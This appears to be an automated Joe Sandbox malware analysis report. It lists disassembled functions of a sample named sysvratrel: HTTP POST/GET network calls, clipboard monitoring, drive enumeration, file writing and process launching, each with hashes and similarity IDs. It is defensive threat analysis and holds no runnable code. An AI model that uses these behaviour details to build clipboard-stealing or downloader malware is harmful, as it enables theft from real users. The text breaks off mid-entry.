memset.NTDLL ref: 0040E758
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E7A8
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E7BB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F4
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E82A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E855
HttpSendRequestA.WININET(00000000,00411DE8,000000FF,00009E34), ref: 0040E87F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E8BE
memcpy.NTDLL(00000000,?,00000000), ref: 0040E910
InternetCloseHandle.WININET(00000000), ref: 0040E941
InternetCloseHandle.WININET(00000000), ref: 0040E94E
InternetCloseHandle.WININET(00000000), ref: 0040E95B

Strings

Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040E7B6
POST, xrefs: 0040E81E
<, xrefs: 0040E760

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
Instruction ID: 85fc693ee375b13e16fb66d1006c55e21916babb9bf1ea115f780426e1cf3f13
Opcode Fuzzy Hash: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
Instruction Fuzzy Hash: C6513DB5A01228ABDB66CF54CC54BDA73BCAB48705F0481E9B60DA6280D7B86FC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405910 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040591C
SetClipboardViewer.USER32(?), ref: 00405968
SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
OpenClipboard.USER32(00000000), ref: 00405A17
GetClipboardData.USER32(00000000), ref: 00405A29
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
ChangeClipboardChain.USER32(?,?), ref: 00405B3E
DefWindowProcA.USER32(?,?,?,?), ref: 00405B54

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
Instruction ID: e885106aa0884b4502b2237862738d0df8f48eeaae93079a212bc481fb1f7e33
Opcode Fuzzy Hash: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
Instruction Fuzzy Hash: E771FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

PCOI, xrefs: 0040160D
ilci, xrefs: 00401630

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci
API String ID: 2403999931-3762367603
Opcode ID: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
Instruction ID: 6a29a2099ab565f473fc8e7e311d0e2c8013c240518d5c358219ad3f6c04db59
Opcode Fuzzy Hash: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
Instruction Fuzzy Hash: C231A675900701ABC720DF70EC48B97B7A8BF08304F048A2AF559A3691D77AF894CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405820 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 00405838
GetModuleHandleW.KERNEL32(00000000), ref: 00405850
Sleep.KERNEL32(00000001), ref: 00405864
GetTickCount.KERNEL32 ref: 0040586A
GetTickCount.KERNEL32 ref: 00405873
wsprintfW.USER32 ref: 00405886
RegisterClassExW.USER32(00000030), ref: 00405893
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
TranslateMessage.USER32(?), ref: 004058E5
DispatchMessageA.USER32(?), ref: 004058EF
ExitThread.KERNEL32 ref: 00405901

Strings

0, xrefs: 00405840
%x%X, xrefs: 0040587A

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
Instruction ID: b462c37bb5856212f40d891765093af4ebd6b4ddfa956f9ba6030597f9716a14
Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
Instruction Fuzzy Hash: 3B212F71940308BBEB10ABA0DC49FEE7B78EB04711F148439F605BA1D0DBB955948F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE00 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040DE28
InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
memcpy.NTDLL(00000000,?,00000000), ref: 0040DFBA
InternetCloseHandle.WININET(00000000), ref: 0040DFF7
InternetCloseHandle.WININET(00000000), ref: 0040E004
InternetCloseHandle.WININET(00000000), ref: 0040E011

Strings

GET, xrefs: 0040DEEB
<, xrefs: 0040DE30

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
Instruction ID: 48cd83f5195f7f7898929b3619b8d091957442f788ca39022680675dc0c7e588
Opcode Fuzzy Hash: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
Instruction Fuzzy Hash: 51510D71941228ABDB36CB50CC55BD9B7BCAB44705F0480E9F60D6A2C1D7B96BC8CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406B30 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00406B3E
GetModuleFileNameW.KERNEL32(00000000,00416C68,00000104), ref: 00406B50

Part of subcall function 0040E9B0: CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
Part of subcall function 0040E9B0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
Part of subcall function 0040E9B0: CloseHandle.KERNEL32(000000FF), ref: 0040E9F2

ExitThread.KERNEL32 ref: 00406CBA

Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE

Sleep.KERNEL32(000007D0), ref: 00406CAD

Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406BEF
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C04
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C1F
wsprintfW.USER32 ref: 00406C32
wsprintfW.USER32 ref: 00406C52
wsprintfW.USER32 ref: 00406C75

Strings

%s%s, xrefs: 00406C69
(%dGB), xrefs: 00406C26
Unnamed volume, xrefs: 00406C46

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$Unnamed volume
API String ID: 1650488544-2117135753
Opcode ID: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
Instruction ID: ad18969486da017d66fc0e664040911e0da7e4c37c3c5655858771b0e8e5c1cf
Opcode Fuzzy Hash: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
Instruction Fuzzy Hash: 6B41A9B1900318BBE714DB94DD55FEE7378EB48700F0081A5F20AB51D0EA785794CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA00 Relevance: 16.6, APIs: 11, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040EA32
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EA53
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EA72
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EA8B
memcmp.NTDLL ref: 0040EB1D
UnmapViewOfFile.KERNEL32(00000000), ref: 0040EB40
CloseHandle.KERNEL32(00000000), ref: 0040EB4A
CloseHandle.KERNEL32(000000FF), ref: 0040EB54
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EB73
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EB98
CloseHandle.KERNEL32(000000FF), ref: 0040EBA2

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID:
API String ID: 3902698870-0
Opcode ID: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
Instruction ID: 5fa72956d792c98bf49e98e2e31999c9ee619b8bc34dd7c72e15d09ac2df7f98
Opcode Fuzzy Hash: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
Instruction Fuzzy Hash: C2514EB5E40208FBDB14DFA4CC49FDEB774AB48704F108569E611B72C0D7B9AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D510 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0040D516
GetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D51D
GetCurrentThread.KERNEL32 ref: 0040D528
SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D52F
InterlockedExchangeAdd.KERNEL32(00407D0E,00000000), ref: 0040D552
EnterCriticalSection.KERNEL32(000000FB), ref: 0040D587
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D5D2
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D5EE
Sleep.KERNEL32(00000001), ref: 0040D61E
GetCurrentThread.KERNEL32 ref: 0040D62D
SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E), ref: 0040D634

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
Instruction ID: 00112f281c6e7fc3510a654903225a70fc6abbe47ad766b876a095a97212bdbe
Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
Instruction Fuzzy Hash: 64411C74E00209EFDB14CFE4D848BAEBBB5EF48305F108566E905A7380D7799A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040EBCE
memset.NTDLL ref: 0040EBDE
CreateProcessW.KERNEL32(00000000,0040F065,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EC17
Sleep.KERNEL32(000003E8), ref: 0040EC27
ShellExecuteW.SHELL32(00000000,open,0040F065,00000000,00000000,00000000), ref: 0040EC42
Sleep.KERNEL32(000003E8), ref: 0040EC5C

Strings

D, xrefs: 0040EBE6
, xrefs: 0040EC51
open, xrefs: 0040EC3B

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
Instruction ID: 0351ccfd918ecb695d128b5eda6762ce2dd083b24a7fe2c71c98e7e13efc789c
Opcode Fuzzy Hash: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
Instruction Fuzzy Hash: FE114271A44308BBF710DB91DD46FDE7774AB14B00F104125F6057E2C1D6FA5A44C759

Uniqueness

Uniqueness Score: -1.00%

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
Instruction ID: a734cc1f61c70acf9279ac5ca78d82aa64a2a4ecc5b5604f6a29b6a4ece08d42
Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
Instruction Fuzzy Hash: 89519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
Sleep.KERNEL32(000003E8), ref: 0040DB2E
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E

Strings

LOCATION: , xrefs: 0040DB55
HTTP/1.1 200 OK, xrefs: 0040DB3F

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
Instruction ID: 994a5b39e446e5258177b8a9e706ad28fc86481e8e9e2fe7090657293928531c
Opcode Fuzzy Hash: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
Instruction Fuzzy Hash: 3A2151B0D44218ABDB20DB64DC45BE97774AB04308F1486E9E719B72C0C6B95ACACF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EC87
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040ECA6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040ECCF
InternetCloseHandle.WININET(00000000), ref: 0040ECF8
InternetCloseHandle.WININET(00000000), ref: 0040ED02
Sleep.KERNEL32(000003E8), ref: 0040ED0D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EC82

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
API String ID: 2743515581-2272513262
Opcode ID: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
Instruction ID: 7e4e1c9f171caca0646539a3bded0a22de56d1af13d1156f275757e23962dbb7
Opcode Fuzzy Hash: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
Instruction Fuzzy Hash: 27213A74A40348FBEB14DF94CC49FEEB775AB04704F1084A9FA11AB2D0C7BA6A40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B500 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(004176A8,?,?,?,?,?,?,00407C92), ref: 0040B50B
CreateFileW.KERNEL32(00417490,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B55D
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B57E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B59D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B5B2
UnmapViewOfFile.KERNEL32(00000000), ref: 0040B618
CloseHandle.KERNEL32(00000000), ref: 0040B622
CloseHandle.KERNEL32(000000FF), ref: 0040B62C

Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID:
API String ID: 439099756-0
Opcode ID: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
Instruction ID: 29fa8a612647d1d21a92a83f8fc84a43d263a312b3bcc6ad32b06dcb2fb765dc
Opcode Fuzzy Hash: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
Instruction Fuzzy Hash: 41413C74E40309BBDB10DFA4CC4ABAEB770EB44708F208569E611B72D1C7B96641CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B60 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00416C40,?,?,?,?,?,00407C5C), ref: 00405B6B
CreateFileW.KERNEL32(00416E70,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407C5C), ref: 00405B85
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
CloseHandle.KERNEL32(00000000), ref: 00405C75
CloseHandle.KERNEL32(000000FF), ref: 00405C7F

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID:
API String ID: 3956458805-0
Opcode ID: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
Instruction ID: fe22dcd5f9c76504c29afc9a33c71b71b278b318499f2180723d1a87b0050cb8
Opcode Fuzzy Hash: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
Instruction Fuzzy Hash: 76311B74A40308EBEB14DBA4CD4AFAFB774EB44704F208569E601772D0D7B96A81CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406000 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON

Download Yara Rule

APIs

